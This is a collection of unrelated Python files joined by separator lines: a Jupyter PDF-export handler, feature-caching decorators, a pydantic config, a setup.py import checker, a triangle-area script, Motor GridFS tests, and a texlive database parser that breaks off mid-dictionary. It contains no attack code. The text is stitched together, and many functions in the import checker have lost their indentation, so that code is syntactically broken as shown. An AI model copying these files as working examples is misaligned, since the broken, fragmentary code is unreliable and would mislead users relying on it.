        ``format`` and ``path`` come from the URL routing groups; only the
        'pdf' format is supported.
        """
        if format != 'pdf':
            self.log.exception('format must be pdf')
            raise web.HTTPError(500, 'format must be pdf')
        # configure the PDF exporter with thermohw's preprocessor/template/filters
        self.config.PDFExporter.preprocessors = [thermohw.ExtractAttachmentsPreprocessor]
        self.config.PDFExporter.template_file = os.path.join(thermohw_dir, 'homework.tpl')
        self.config.PDFExporter.filters = {'convert_div': thermohw.convert_div,
                                           'convert_raw_html': thermohw.convert_raw_html}
        self.config.PDFExporter.latex_count = 1
        exporter = PDFExporter(config=self.config, log=self.log)
        exporter.writer.build_directory = '.'
        pdfs = []
        # the URL path concatenates notebook paths; splitting on '.ipynb'
        # recovers the individual notebook paths (suffix re-added below)
        path = path.strip('/').strip()
        paths = path.split('.ipynb')
        for path in paths:
            if not path:
                continue
            path += '.ipynb'
            # If the notebook relates to a real file (default contents manager),
            # give its path to nbconvert.
            ext_resources_dir: Union[str, None]
            basename: str
            os_path: str
            if hasattr(self.contents_manager, '_get_os_path'):
                os_path = self.contents_manager._get_os_path(path)
                ext_resources_dir, basename = os.path.split(os_path)
            else:
                ext_resources_dir = None
            model: Dict[str, str] = self.contents_manager.get(path=path)
            name: str = model['name']
            if model['type'] != 'notebook':
                # not a notebook, redirect to files
                return FilesRedirectHandler.redirect_to_files(self, path)
            nb = model['content']
            self.set_header('Last-Modified', model['last_modified'])
            # create resources dictionary for the exporter (title + mod date
            # feed the template; config_dir lets nbconvert find user config)
            mod_date: str = model['last_modified'].strftime(text.date_format)
            nb_title: str = os.path.splitext(name)[0]
            config_dir: str = self.application.settings['config_dir']
            resource_dict: Dict[str, str] = {
                "metadata": {
                    "name": nb_title,
                    "modified_date": mod_date
                },
                "config_dir": config_dir,
            }
            if ext_resources_dir:
                resource_dict['metadata']['path'] = ext_resources_dir
            output: bytes
            try:
                output, _ = exporter.from_notebook_node(
                    nb,
                    resources=resource_dict
                )
            except Exception as e:
                self.log.exception("nbconvert failed: %s", e)
                raise web.HTTPError(500, "nbconvert failed: %s" % e)
            pdfs.append(io.BytesIO(output))
        # merge all converted notebooks into a single PDF document
        writer = PdfWriter()
        for pdf in pdfs:
            writer.addpages(PdfReader(pdf).pages)
        bio = io.BytesIO()
        writer.write(bio)
        bio.seek(0)
        output = bio.read()
        bio.close()
        # Force download if requested
        if self.get_argument('download', 'false').lower() == 'true':
            filename = 'final_output.pdf'
            self.set_header('Content-Disposition',
                            'attachment; filename="{}"'.format(filename))
        # MIME type
        if exporter.output_mimetype:
            self.set_header('Content-Type',
                            '{}; charset=utf-8'.format(exporter.output_mimetype))
        self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
        self.finish(output)
def load_jupyter_server_extension(nb_server_app: 'NotebookWebApplication') -> None:
    """Call when the extension is loaded.

    Registers the DLConvert download handler on the notebook web application.

    Args:
        nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance.
    """
    web_app = nb_server_app.web_app
    # Match requests for any host.
    host_pattern = '.*$'
    # _format_regex = r"(?P<format>\w+)"
    # path_regex = r"(?P<path>(?:(?:/[^/]+)+|/?))"
    # NOTE(review): `_format_regex` and `path_regex` are used below, but their
    # definitions here are commented out — confirm they are defined at module
    # level elsewhere, otherwise this raises NameError when the extension loads.
    route_pattern = url_path_join(web_app.settings['base_url'],
                                  r"/dlconvert/{fmt_regex}{path_regex}".format(
                                      fmt_regex=_format_regex, path_regex=path_regex))
    web_app.add_handlers(host_pattern, [(route_pattern, DLConvertHandler)])
|
from ..storage import source_utils
from ..storage.caching import cache
from .. import config
from .storage import FeatureConstructor
from ..storage import dataframe
from IPython.display import display
from glob import glob
import os
def preview(df, sizes=(2, 4, 6)):
    """
    Applies function to heads of particular dataframe.
    Example:
    ``` python
    @preview(df, sizes=[5, 15])
    def make_ohe_pclass(df):
        ...
    ```
    Note: the decorator displays the results and returns None, so the
    decorated name is rebound to None — preview is for inspection only.
    """
    def __preview(function):
        # Flag that we are inside a preview call for the rest of the pipeline.
        config.preview_call = 1
        try:
            for size in sizes:
                if isinstance(df, dataframe.DataFrame):
                    head = dataframe.DataFrame(df.head(size), df.train, df.encoders)
                else:
                    head = dataframe.DataFrame(df.head(size), True, {})
                display(function(head))
        finally:
            # Always clear the flag, whether the preview succeeded or raised.
            config.preview_call = 0
    return __preview
def register(*args, cache_default=True):
    """
    Registers function for further caching its calls and restoring source.
    Example:
    ``` python
    @register
    def make_ohe_pclass(df):
        ...
    ```
    Usable both as a bare decorator and as ``register(func)``.
    """
    def __register(func):
        key = func.__name__ + '_fc'
        if key in cache.cached_objs():
            existing = cache.load_obj(key)
            # A cached functor with the same name but different source is a clash.
            if source_utils.get_source(func) != existing.source:
                raise NameError("A function with the same name is already registered")
            return existing
        functor = FeatureConstructor(func, cache_default)
        cache.cache_obj(functor, functor.__name__ + '_fc')
        return functor
    if args:
        # Called as a bare decorator: @register
        return __register(args[0])
    # Called with arguments: @register(cache_default=False)
    return __register
def deregister(name, force=False):
    """
    Deletes sources and cached calls of a certain function.
    Usage:
    ``` python
    deregister('make_new_features')
    deregister('make_new_features', force=True)
    ```
    Without ``force``, lists what would be removed and asks the user to type
    the function name to confirm.
    """
    fc_name = name + '_fc'
    df_names = [df_name for df_name in cache.cached_dfs() if df_name.startswith(name + '__')]
    if not force:
        # Show everything that is about to be removed, then require the exact
        # function name as confirmation.
        print("Are you sure you want to delete all these cached files?")
        if fc_name in cache.cached_objs():
            print(fc_name)
        for df_name in df_names:
            print(df_name)
        print("To confirm please print full name of the function:")
        if input() != name:
            print("Doesn't match")
            return
    if fc_name in cache.cached_objs():
        print(f'removing {fc_name}')
        cache.remove_obj(fc_name)
    for df_name in df_names:
        print(f'removing {df_name}')
        cache.remove_df(df_name)
def dropper(function):
    """
    Registers function that won't be cached.
    Is recommended to be used only with functions which actually drop columns or rows and don't produce any new data.
    Example:
    ``` python
    @dropper
    def drop_pclass(df):
        return stl.column_dropper(['Pclass'])(df)
    ```
    """
    # Wipe any previous registration of the same name, then register the
    # function with caching disabled (droppers produce no new data worth caching).
    deregister(function.__name__, force=True)
    return register(function, cache_default=False)
def selector(function):
    """
    Registers function that won't be cached.
    Is recommended to be used only with functions which actually select columns or rows and don't produce any new data.
    Example:
    ``` python
    @selector
    def select_pclass_cabin(df):
        return stl.column_selector(['Pclass', 'Cabin'])(df)
    ```
    """
    # Same flow as `dropper`: re-register from scratch without caching.
    deregister(function.__name__, force=True)
    return register(function, cache_default=False)
def helper(func):
    """
    Save function as helper to store its source
    and be able to define it in any notebook with kts.helpers.define_in_scope()

    :param func: function
    :return: the same function, with a ``.source`` attribute attached
    """
    assert '__name__' in dir(func), 'Helper should have a name'
    func.source = source_utils.get_source(func)
    key = func.__name__ + '_helper'
    # Replace any previously cached helper of the same name.
    if key in cache.cached_objs():
        cache.remove_obj(key)
    cache.cache_obj(func, key)
    return func
|
from pydantic import BaseModel, validator
from tracardi.process_engine.tql.condition import Condition
class Configuration(BaseModel):
    """Segmentation config: a TQL condition plus the segment/action pair
    applied when the condition evaluates true or false."""
    condition: str
    true_action: str = 'add'
    false_action: str = 'remove'
    true_segment: str
    false_segment: str

    @staticmethod
    def _check_segment(value, values, action_field):
        # A segment name is mandatory whenever the paired action is not 'none'.
        if action_field in values and values[action_field] != 'none':
            if value == "":
                raise ValueError("Segment can not be empty for action {}".format(values[action_field]))
        return value

    @validator("condition")
    def is_valid_condition(cls, value):
        # Parse eagerly so a malformed condition fails at configuration time.
        _condition = Condition()
        try:
            _condition.parse(value)
        except Exception as e:
            raise ValueError(str(e))
        return value

    @validator("true_segment")
    def is_valid_true_segment(cls, value, values):
        return cls._check_segment(value, values, 'true_action')

    @validator("false_segment")
    def is_valid_false_segment(cls, value, values):
        return cls._check_segment(value, values, 'false_action')
|
"""Check for import problems.""" # pylint: disable=invalid-name
# [ Imports:Python ]
import ast
import contextlib
import os
import pathlib
import re
import sys
import types
import typing
# [ Imports:Third Party ]
import setuptools # type: ignore
# [ Types ]
IndexedStrings = typing.List[typing.Tuple[int, str]]
# [ Internals ]
def _get_package_parent_path(path: pathlib.Path) -> pathlib.Path:
parts = path.parts
for index in range(len(parts)):
current_parts = parts[:index + 1]
root, *others = current_parts
upstream_path = pathlib.Path(root).joinpath(*others)
if (upstream_path / '__init__.py').exists():
if not others:
raise RuntimeError("can't get the package parent - the root dir has an __init__.py!")
return upstream_path.parent
return path.parent
def _to_module(path: pathlib.Path) -> str:
parts = path.parts
index = 0
for index in range(len(parts)):
current_parts = parts[:index + 1]
root, *others = current_parts
upstream_path = pathlib.Path(root).joinpath(*others)
if (upstream_path / '__init__.py').exists():
break
module_parts = list(parts[index:])
if module_parts[-1] == '__init__.py':
module_parts = module_parts[:-1]
if module_parts[-1].endswith('.py'):
*others, final = module_parts
final = final[:-3]
module_parts = [*others, final]
return '.'.join(module_parts)
def _rebuild_source_module(module_name: str, *, level: int, path_str: str) -> str:
"""
Rebuild the source module.
If not level, there must be a module name (otherwise we have "from import foo", which is invalid syntax)
If level, we may or may not have a module name:
"from .. import foo" is level 2, no module name
"from .bar import foo" is level 1, module name "bar"
"""
if not level:
return module_name
parent_path = pathlib.Path(path_str)
for _ in range(level):
parent_path = parent_path.parent
relative_module_parent = _to_module(parent_path)
if not module_name:
return relative_module_parent
return f"{relative_module_parent}.{module_name}"
def _parse_imports(path: pathlib.Path) -> typing.List[typing.Tuple[pathlib.Path, int, str]]:
    """Parse a file's top-level imports into (path, line-number, module-name) triples.

    Plain ``import x`` statements are recorded directly.  ``from ... import``
    statements are only processed when they are relative (non-zero level) and
    name a module — NOTE(review): absolute ``from x import y`` statements
    (level 0) are skipped entirely here; confirm that is intentional.  For
    relative imports, each imported name is test-imported: names that resolve
    as modules are recorded individually, otherwise the source module itself
    is recorded once.
    """
    path_str = str(path)
    source = path.read_text()
    this_ast = ast.parse(source, filename=path_str)
    import_nodes = [n for n in this_ast.body if isinstance(n, ast.Import)]
    import_from_nodes = [n for n in this_ast.body if isinstance(n, ast.ImportFrom)]
    import_from_nodes = [n for n in import_from_nodes if n.module]
    imports = []
    for this_import_node in import_nodes:
        line_number = this_import_node.lineno
        for this_name in this_import_node.names:
            imports.append((path, line_number, this_name.name))
    for this_import_from_node in import_from_nodes:
        if not this_import_from_node.module or not this_import_from_node.level:
            # "filtering" here because mypy doesn't recognize it if we filter it in the
            # list comprehension
            continue
        line_number = this_import_from_node.lineno
        source_module = _rebuild_source_module(this_import_from_node.module, level=this_import_from_node.level, path_str=path_str)
        import_source = False
        for this_name in this_import_from_node.names:
            full_name = f"{source_module}.{this_name.name}"
            try:
                # validating import
                # pylint: disable=exec-used
                exec(f"import {full_name}")  # nosec
                # pylint: enable=exec-used
            except ModuleNotFoundError:
                # The imported name is not itself a module (function/class/etc.),
                # so record the containing module instead (after the loop).
                import_source = True
            else:
                imports.append((path, line_number, f"{full_name}"))
        if import_source:
            imports.append((path, line_number, f"{source_module}"))
    return imports
def _is_python_module(module: types.ModuleType) -> bool:
return (
not hasattr(module, '__file__') or
not module.__file__ or
(
'lib/python' in module.__file__ and
'packages' not in module.__file__
)
)
def _is_project_module(module: types.ModuleType, project_paths: typing.List[pathlib.Path]) -> bool:
    """True when *module* is one of the project's own source files."""
    if _is_python_module(module):
        return False
    return pathlib.Path(module.__file__) in project_paths
def _is_third_party_module(module: types.ModuleType, project_paths: typing.List[pathlib.Path]) -> bool:
    """True when *module* is neither standard library nor part of the project."""
    if _is_python_module(module):
        return False
    return not _is_project_module(module, project_paths=project_paths)
def _get_module_names(
all_python_paths: typing.List[pathlib.Path],
) -> typing.List[typing.Tuple[pathlib.Path, int, str]]:
all_module_names: typing.List[typing.Tuple[pathlib.Path, int, str]] = []
for this_path in all_python_paths:
all_module_names += _parse_imports(this_path)
return all_module_names
def _get_unique_imports(
        all_python_paths: typing.List[pathlib.Path],
) -> typing.Dict[str, typing.Tuple[pathlib.Path, int]]:
    """Map each imported module name to the first (path, line) that imports it."""
    unique: typing.Dict[str, typing.Tuple[pathlib.Path, int]] = {}
    for source_path, line_number, module_name in _get_module_names(all_python_paths):
        unique.setdefault(module_name, (source_path, line_number))
    return unique
def _identify_unused_local_modules(
all_python_paths: typing.List[pathlib.Path],
*,
all_project_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
) -> typing.List[str]:
# a '-' in a name means it's not importable as a module - this would just be a script someone calls.
local_modules = [_to_module(p) for p in all_python_paths if '-' not in str(p)]
return [
this_module
for this_module in local_modules
if (
this_module not in all_project_modules and
not any(a.startswith(f"{this_module}.") for a in all_project_modules) and
this_module not in (
'setup', # setup.py
'example_module', # imported by string in test
'test', # the test package
)
)
]
def _load_modules(unique_top_level_imports: typing.Dict[str, typing.Tuple[pathlib.Path, int]]) -> typing.Tuple[typing.Dict[str, typing.Tuple[pathlib.Path, int]], typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]]]:
    """Try to import every module name; split them into missing vs loadable.

    Returns ``(missing, actual)``: ``missing`` maps names that raised
    ModuleNotFoundError to their (path, line) origin; ``actual`` maps loadable
    names to (path, line, module object) triples looked up in ``sys.modules``.

    The importing file's package parent is temporarily appended to
    ``sys.path`` so project-relative imports resolve.
    """
    missing_modules = {}
    loadable_modules = {}
    for module_name, source_data in unique_top_level_imports.items():
        # Compute the sys.path entry *before* the try block: previously a
        # failure in _get_package_parent_path left `path` unbound and the
        # finally clause raised a NameError that masked the real error.
        original_dir = pathlib.Path.cwd()
        path = _get_package_parent_path(source_data[0])
        path_added = path != original_dir
        if path_added:
            sys.path.append(str(path))
        try:
            # validating import
            # pylint: disable=exec-used
            exec(f"import {module_name}")  # nosec
            # pylint: enable=exec-used
        except ModuleNotFoundError:
            missing_modules[module_name] = source_data
        else:
            loadable_modules[module_name] = source_data
        finally:
            if path_added:
                sys.path.remove(str(path))
    # every successfully imported module is reachable via sys.modules
    actual_modules = {m: (loadable_modules[m][0], loadable_modules[m][1], sys.modules[m]) for m in loadable_modules}
    return missing_modules, actual_modules
def _identify_missing_third_party_modules(
third_party_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
*,
installed_modules: IndexedStrings,
) -> typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]]:
return {
m: s
for m, s in third_party_modules.items()
if (
m not in [m[1] for m in installed_modules] and
m not in (
'setuptools', # included by pip
)
)
}
def _identify_unused_third_party_modules(
third_party_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
*,
installed_modules: IndexedStrings,
) -> IndexedStrings:
return [
(index, module_name)
for index, module_name in installed_modules
if (
module_name not in third_party_modules and
module_name not in (
# module names which differ from import names
)
)
]
def _report_package_problems(
*,
missing_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int]],
missing_third_party: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
unused_third_party: IndexedStrings,
unused_local: typing.List[str],
) -> bool:
# Error if any missing or unused modules exist.
errors_found = bool(missing_modules or missing_third_party or unused_third_party or unused_local)
# unimportable modules
for name, source_data in missing_modules.items():
print(f"{source_data[0]}:{source_data[1]} -> {name} (unimportable)")
# third-party modules missing from install requires
for name, extended_source_data in missing_third_party.items():
print(f"{extended_source_data[0]}:{extended_source_data[1]} -> {name} (missing-from-install-requires)")
# install requires modules not used
for index, module_name in unused_third_party:
print(f"setup.py:{index} -> {module_name} (unused-install-requires)")
# local modules not imported
for this_path_str in unused_local:
print(f"{this_path_str} (unused-project-module)")
return errors_found
def _report_test_problems(
*,
missing_modules: typing.Dict[str, typing.Tuple[pathlib.Path, int]],
missing_third_party: typing.Dict[str, typing.Tuple[pathlib.Path, int, types.ModuleType]],
unused_third_party: IndexedStrings,
unused_local: typing.List[str],
) -> bool:
# Error if any missing or unused modules exist.
errors_found = bool(missing_modules or missing_third_party or unused_third_party or unused_local)
# unimportable modules
for name, source_data in missing_modules.items():
print(f"{source_data[0]}:{source_data[1]} -> {name} (unimportable)")
# third-party modules missing from install requires
for name, extended_source_data in missing_third_party.items():
print(f"{extended_source_data[0]}:{extended_source_data[1]} -> {name} (missing-from-extras-require)")
# install requires modules not used
for index, module_name in unused_third_party:
print(f"setup.py:{index} -> {module_name} (unused-extras-require)")
# local modules not imported
for this_path_str in unused_local:
print(f"{this_path_str} (unused-test-module)")
return errors_found
def _get_names_of_items_in(target_dir: pathlib.Path) -> typing.Tuple[str, ...]:
local_items = target_dir.iterdir()
local_names = tuple(i.name for i in local_items)
return local_names
def _get_package_dir() -> pathlib.Path:
    """Walk up from this file's directory until a ``setup.py`` is found.

    Raises FileNotFoundError when the filesystem root is reached without
    finding one.  (The original looped forever in that case, because the
    root's parent is the root itself.)
    """
    target_dir = pathlib.Path(__file__).parent
    while 'setup.py' not in _get_names_of_items_in(target_dir):
        parent = target_dir.parent
        if parent == target_dir:
            # reached the filesystem root without finding setup.py
            raise FileNotFoundError("setup.py not found in any parent directory")
        target_dir = parent
    return target_dir
def _get_setup_packages() -> typing.List[str]:
    """Return setuptools' discovered packages, insisting they are all strings."""
    packages: typing.List[str] = []
    for this_package in setuptools.find_packages():
        if not isinstance(this_package, str):
            raise TypeError(f"Got non-str response from setuptools.find_packages: ({type(this_package)}) {this_package}")
        packages.append(this_package)
    return packages
def _to_indexed_module_names(indexed_section_lines: IndexedStrings) -> IndexedStrings:
module_name_pattern = r'.*[\'"]([a-zA-Z_\-0-9]+)[\'"],'
indexed_module_names = []
for index, line in indexed_section_lines:
match = re.match(module_name_pattern, line)
if not match:
continue
if '# no-import' in line:
continue
matched_name = match.group(1)
indexed_module_names.append((index, matched_name))
return indexed_module_names
def _get_setup_modules(section: str) -> IndexedStrings:
    """Extract the (line-index, module-name) entries of a setup.py list section.

    Finds the line where *section* is assigned (e.g. ``install_requires=[``),
    then consumes following lines until indentation returns to the section's
    own level, and parses quoted module names out of that span.  Returns []
    when the section is absent.
    """
    setup_path = _get_package_dir() / 'setup.py'
    setup_lines = setup_path.read_text().splitlines()
    start_line_number = None
    stop_line_number = len(setup_lines) - 1
    indentation = None
    # NOTE: both loops deliberately share this iterator — the second loop
    # resumes scanning right after the line where the first loop broke.
    enumerated = enumerate(setup_lines)
    for index, this_line in enumerated:
        if not re.search(f'{section}.*[:=]', this_line):
            continue
        start_line_number = index
        match = re.search(r'^(\s*)', this_line)
        # match is guaranteed, because we're asking for *any* space, even none.
        match = typing.cast(typing.Match, match)
        indentation = match.group(1)
        break
    else:
        # XXX EARLY RETURN
        return []
    for index, this_line in enumerated:
        match = re.search(r'^(\s*)', this_line)
        # match is guaranteed, because we're asking for *any* space, even none.
        match = typing.cast(typing.Match, match)
        this_indentation = match.group(1)
        if len(this_indentation) <= len(indentation):
            stop_line_number = index
            break
    enumerated_setup_lines = list(enumerate(setup_lines))
    indexed_section_lines = enumerated_setup_lines[start_line_number:stop_line_number]
    return _to_indexed_module_names(indexed_section_lines)
@contextlib.contextmanager
def _change_dir(directory: pathlib.Path) -> typing.Generator[None, None, None]:
original_dir = os.curdir
os.chdir(directory)
try:
yield
finally:
os.chdir(original_dir)
def _modules_to_paths(module_names: typing.Iterable[str]) -> typing.List[pathlib.Path]:
current_dir = pathlib.Path.cwd()
paths = []
for name in module_names:
as_module_path = current_dir / f"{name}.py"
if as_module_path.exists():
paths.append(as_module_path)
continue
as_package_path = current_dir / f"{name}"
python_files = [*as_package_path.glob('*.py'), *as_package_path.glob('**/*.py')]
paths += python_files
return paths
def _get_package_python_paths() -> typing.List[pathlib.Path]:
    """All .py paths shipped with the package, per setup.py's packages/py_modules."""
    with _change_dir(_get_package_dir()):
        module_names = _get_setup_packages() + [entry[1] for entry in _get_setup_modules('py_modules')]
        return _modules_to_paths(module_names)
def _get_test_python_paths() -> typing.List[pathlib.Path]:
    """All repository .py files that are not shipped package files."""
    with _change_dir(_get_package_dir()):
        everything = list(pathlib.Path.cwd().glob('**/*.py'))
        shipped = _get_package_python_paths()
        return [p for p in everything if p not in shipped]
def _get_package_modules(package_python_paths: typing.List[pathlib.Path]) -> dict:
    """Classify everything the package imports.

    Returns a dict with keys 'missing', 'third party', 'project' and
    'specified' (the latter taken from setup.py's install_requires section).
    """
    missing, installed = _load_modules(_get_unique_imports(package_python_paths))
    return {
        'missing': missing,
        'third party': {
            name: data for name, data in installed.items()
            if _is_third_party_module(data[2], project_paths=package_python_paths)
        },
        'project': {
            name: data for name, data in installed.items()
            if _is_project_module(data[2], project_paths=package_python_paths)
        },
        'specified': _get_setup_modules('install_requires'),
    }
def _get_test_modules(test_python_paths: typing.List[pathlib.Path], *, package_python_paths: typing.List[pathlib.Path]) -> dict:
    """Classify everything the test sources import.

    Mirrors ``_get_package_modules`` but treats package files as
    non-third-party too, and reads the 'test' extras section of setup.py.
    """
    missing, installed = _load_modules(_get_unique_imports(test_python_paths))
    return {
        'missing': missing,
        'third party': {
            name: data for name, data in installed.items()
            if _is_third_party_module(data[2], project_paths=test_python_paths + package_python_paths)
        },
        'project': {
            name: data for name, data in installed.items()
            if _is_project_module(data[2], project_paths=test_python_paths)
        },
        'specified': _get_setup_modules('test'),
    }
# [ API ]
def main() -> None:
    """Check the imports for the package."""
    # Files to inspect: shipped package sources vs everything else (tests etc).
    package_paths = _get_package_python_paths()
    test_paths = _get_test_python_paths()
    # Classify what each group imports.
    package_info = _get_package_modules(package_paths)
    test_info = _get_test_modules(test_paths, package_python_paths=package_paths)
    # Identify problems for the shipped package...
    pkg_missing_third_party = _identify_missing_third_party_modules(
        package_info['third party'],
        installed_modules=package_info['specified'],
    )
    pkg_unused_third_party = _identify_unused_third_party_modules(
        package_info['third party'],
        installed_modules=package_info['specified'],
    )
    pkg_unused_local = _identify_unused_local_modules(
        package_paths, all_project_modules=package_info['project'])
    # ...and for the test sources.
    test_missing_third_party = _identify_missing_third_party_modules(
        test_info['third party'],
        installed_modules=test_info['specified'],
    )
    test_unused_third_party = _identify_unused_third_party_modules(
        test_info['third party'],
        installed_modules=test_info['specified'],
    )
    test_unused_local = _identify_unused_local_modules(
        test_paths, all_project_modules=test_info['project'])
    # Report both groups, then fail the run if anything was flagged.
    package_error = _report_package_problems(
        missing_modules=package_info['missing'],
        missing_third_party=pkg_missing_third_party,
        unused_third_party=pkg_unused_third_party,
        unused_local=pkg_unused_local,
    )
    test_error = _report_test_problems(
        missing_modules=test_info['missing'],
        missing_third_party=test_missing_third_party,
        unused_third_party=test_unused_third_party,
        unused_local=test_unused_local,
    )
    if package_error or test_error:
        exit(1)
# [ Script ]
# Run the import check when executed directly (exits 1 when problems exist).
if __name__ == '__main__':
    main()
|
# Compute the area of a triangle from its three side lengths (Heron's formula).
print("AREA OF TRIANGLE ")
print("Enter the Sides of Triangle (a,b,c)")
try:
    # Three whitespace-separated values on one line.
    x, y, z = input("ENTER THE VALUES OF X,Y,Z ").split()  # split by space
except Exception as e:
    print(e)
    exit(0)
print(f"X={x}\nY={y}\nZ={z}")
try:
    x = int(x)
    y = int(y)
    z = int(z)
except ValueError as e:
    # Previously non-integer input crashed with an unhandled traceback.
    print(e)
    exit(0)
# Heron's formula only yields a real area when the triangle inequality holds;
# previously an impossible triangle silently printed a complex number.
if x + y < z or y + z < x or x + z < y:
    print(f"Sides ({x},{y},{z}) do not form a valid triangle")
    exit(0)
s = (x + y + z) / 2  # semi-perimeter
print(f"Semi-perimeter={s}")
area = (s * (s - x) * (s - y) * (s - z)) ** 0.5
print(f"Area of given triangle with sides ({x},{y},{z}) is : {area}")
|
# -*- coding: utf-8 -*-
# Copyright 2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test MotorGridFSBucket."""
from io import BytesIO
from gridfs.errors import NoFile
from tornado import gen
from tornado.testing import gen_test
import motor
from test.tornado_tests import MotorTest
class MotorGridFSBucketTest(MotorTest):
    """Exercise MotorGridFSBucket upload/download/delete round trips."""

    async def _reset(self):
        # Drop every GridFS collection these tests may have touched.
        for collection in ("fs.files", "fs.chunks", "alt.files", "alt.chunks"):
            await self.db.drop_collection(collection)

    def setUp(self):
        super().setUp()
        self.io_loop.run_sync(self._reset)
        self.bucket = motor.MotorGridFSBucket(self.db)

    def tearDown(self):
        self.io_loop.run_sync(self._reset)
        super().tearDown()

    @gen_test
    async def test_basic(self):
        # Round-trip a small payload through upload_from_stream.
        file_id = await self.bucket.upload_from_stream("test_filename",
                                                       b"hello world")
        stream = await self.bucket.open_download_stream(file_id)
        payload = await stream.read()
        self.assertEqual(b"hello world", payload)
        self.assertEqual(1, (await self.db.fs.files.count_documents({})))
        self.assertEqual(1, (await self.db.fs.chunks.count_documents({})))

        # Deleting removes both the file document and its chunks.
        await self.bucket.delete(file_id)
        with self.assertRaises(NoFile):
            await self.bucket.open_download_stream(file_id)
        self.assertEqual(0, (await self.db.fs.files.count_documents({})))
        self.assertEqual(0, (await self.db.fs.chunks.count_documents({})))

        # The stream-style upload API writes the same bytes back out.
        writer = self.bucket.open_upload_stream("test_filename")
        await writer.write(b"hello world")
        await writer.close()
        sink = BytesIO()
        await self.bucket.download_to_stream(writer._id, sink)
        self.assertEqual(b"hello world", sink.getvalue())
|
#!/usr/bin/python3
##
## Script to parse texlive.tlpdb and get list of files in a package
##
## Copyright (C) 2019-2020 Henrik Grimler
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <https://www.gnu.org/licenses/>.
def parse_tlpdb_to_dict(tlpdb_path):
    """Read a texlive.tlpdb database into a dict.

    Returns ``{package_name: {"depends": [...], "files": [...]}}``.  Package
    stanzas in the database are separated by blank lines; only the ``depend``
    entries and the ``runfiles`` file list are kept.
    """
    with open(tlpdb_path, "r") as db_file:
        stanzas = db_file.read().split("\n\n")
    pkg_dict = {}
    for stanza in stanzas:
        if stanza == "":
            continue
        lines = stanza.split("\n")
        name = lines[0].split(" ")[1]
        entry = {"depends": [], "files": []}
        pkg_dict[name] = entry
        index = 0
        while index < len(lines):
            if lines[index].split(" ")[0].startswith("runfiles"):
                # The file list follows; each file line is indented by one
                # space, e.g. " texmf-dist/tex/latex/collref/collref.sty"
                index += 1
                while index < len(lines) and lines[index].startswith(" "):
                    entry["files"].append(lines[index].split(" ")[1])
                    index += 1
                if index == len(lines):
                    break
            if lines[index].split(" ")[0] == "depend":
                entry["depends"].append(lines[index].split(" ")[1])
            index += 1
    return pkg_dict
def get_files_in_package(package, files_in_package, visited_pkgs, visit_collections=False):
    """Accumulate the files of *package* and, recursively, of its dependencies.

    Collections are skipped unless ``visit_collections=True``; ``*.ARCH``
    dependencies are always skipped (we build our own binaries).  Returns the
    updated ``(files_in_package, visited_pkgs)`` lists.
    """
    files_in_package.extend(pkg_dict[package]["files"])
    for dep in pkg_dict[package]["depends"]:
        if dep.split(".")[-1] == "ARCH":
            # skip arch dependent packages, which we lack since we build our own binaries
            continue
        if dep.split("-")[0] == "collection" and not visit_collections:
            # Skip collections unless explicitly told to go through them.
            # (Bug fix: the original condition was `... == "collection" or
            # visit_collections`, which skipped *every* dependency whenever
            # visit_collections=True.)
            continue
        if dep not in visited_pkgs:
            # avoid duplicates
            visited_pkgs.append(dep)
            # Propagate visit_collections so the whole tree honors the flag.
            files_in_package, visited_pkgs = get_files_in_package(
                dep, files_in_package, visited_pkgs,
                visit_collections=visit_collections)
    return files_in_package, visited_pkgs
def Files(packages, bool_visit_collections=False):
    """Collect the file lists of several packages.

    Thin wrapper around ``get_files_in_package``; collections are only
    visited when ``bool_visit_collections`` is True.
    """
    collected = []
    for package in packages:
        files, _ = get_files_in_package(package, [], [],
                                        visit_collections=bool_visit_collections)
        collected += files
    return collected
def get_conflicting_pkgs(package):
    """Returns list of packages that contain some files that are also found in 'package'.
    These packages should be listed as dependencies.

    Raises ValueError for an unrecognized ``collection-*`` name.
    """
    base = ["collection-basic", "collection-latex"]
    # Collections whose only conflicts are the two base collections.
    base_only_collections = {
        "collection-langeuropean", "collection-langenglish", "collection-langfrench",
        "collection-langgerman", "collection-binextra", "collection-fontutils",
        "collection-langarabic", "collection-langgreek", "collection-langitalian",
        "collection-langother", "collection-langpolish", "collection-langportuguese",
        "collection-langspanish", "collection-metapost", "collection-fontsrecommended",
        "collection-games", "collection-luatex", "collection-music",
        "collection-plaingeneric", "collection-publishers", "collection-texworks",
        "collection-wintools", "collection-xetex",
    }
    # Collections with conflicts beyond the base pair (base is prepended below).
    extra_conflicts = {
        "collection-langczechslovak": ["collection-fontsextra", "collection-luatex"],
        "collection-langcyrillic": ["collection-fontsextra", "collection-fontsrecommended",
                                    "collection-langgreek", "collection-latexrecommended"],
        "collection-formatsextra": ["collection-langcyrillic", "collection-mathscience",
                                    "collection-fontsrecommended", "collection-plaingeneric"],
        "collection-context": ["collection-mathscience", "collection-fontsrecommended",
                               "collection-metapost", "collection-xetex"],
        "collection-langjapanese": ["collection-langcjk", "collection-langchinese"],
        "collection-langchinese": ["collection-langcjk", "collection-fontutils"],
        "collection-bibtexextra": ["collection-binextra"],
        "collection-langcjk": ["collection-langother"],
        "collection-latexrecommended": ["collection-fontsrecommended", "collection-latexextra",
